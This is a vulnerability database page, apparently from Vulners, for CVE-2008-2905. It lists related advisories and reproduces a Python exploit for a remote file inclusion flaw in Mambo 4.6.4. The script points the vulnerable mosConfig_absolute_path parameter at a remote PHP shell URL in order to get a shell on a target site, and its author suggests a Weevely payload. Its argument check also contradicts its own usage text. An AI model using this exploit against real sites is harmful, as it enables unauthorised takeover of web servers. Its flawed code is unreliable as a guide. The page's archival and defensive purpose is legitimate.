| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2008-2905 | 13 Jun 200800:00 | – | circl | |
| CVE-2008-2905 | 30 Jun 200818:00 | – | cve | |
| CVE-2008-2905 | 30 Jun 200818:00 | – | cvelist | |
| Mambo - Cache_Lite Class MosConfig_absolute_path Remote File Inclusion (Metasploit) | 24 Nov 201000:00 | – | exploitdb | |
| Mambo 4.6.4 - Cache Lite Output Remote File Inclusion (Metasploit) | 14 Jun 200800:00 | – | exploitdb | |
| Mambo 4.6.4 - Cache Lite Output Remote File Inclusion (Metasploit) | 14 Jun 200800:00 | – | exploitpack | |
| Mambo Cache_Lite Class mosConfig_absolute_path Remote File Include | 20 Oct 200915:01 | – | metasploit | |
| CVE-2008-2905 | 30 Jun 200818:24 | – | nvd | |
| Mambo Cache_Lite Class mosConfig_absolute_path Remote File Inclusion | 30 Oct 200900:00 | – | packetstorm | |
| Remote file inclusion | 30 Jun 200818:24 | – | prion |
`#!/usr/bin/env python
# Title: Mambo 4.6.4 mosConfig_absolute_path RFI
# CVE: CVE-2008-2905
# Reference: http://heapoverflow.com/f0rums/advisories/6915-cve-2008-2905-mambo.html
# Author: infodox
# Site: http://insecurety.net/
# Twitter: @info_dox
# Old news, just practicin' my python :3
import requests # You better easy_install requests :3
import sys
vulnurl = "/includes/Cache/Lite/Output.php?" # Oh look, the vuln URL!
param = "mosConfig_absolute_path=" # the vuln paramater.
payloadurl = "http://example.com/shell.php" # Your evil PHP code goes here right?
def banner():
print """
Mambo 4.6.4 mosConfig_absolute_path RFI
Rather lame exploit I must admit, just practicing my Python.
To use, just run it against the host and pray. I advise using a Weevely payload.
~infodox
"""
if len(sys.argv) != 4:
banner()
print "Usage: ./x2.py <target>"
print "Where <target> is the vulnerable website."
print "Example: ./x2.py http://lamesite.com"
sys.exit(1)
banner()
target = sys.argv[1]
pwnme = target + vulnurl + param + payloadurl
print "[+] Running Exploit..."
requests.get(pwnme) # See? Requests is AWESOME!
print "[?] Gotshell?"
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation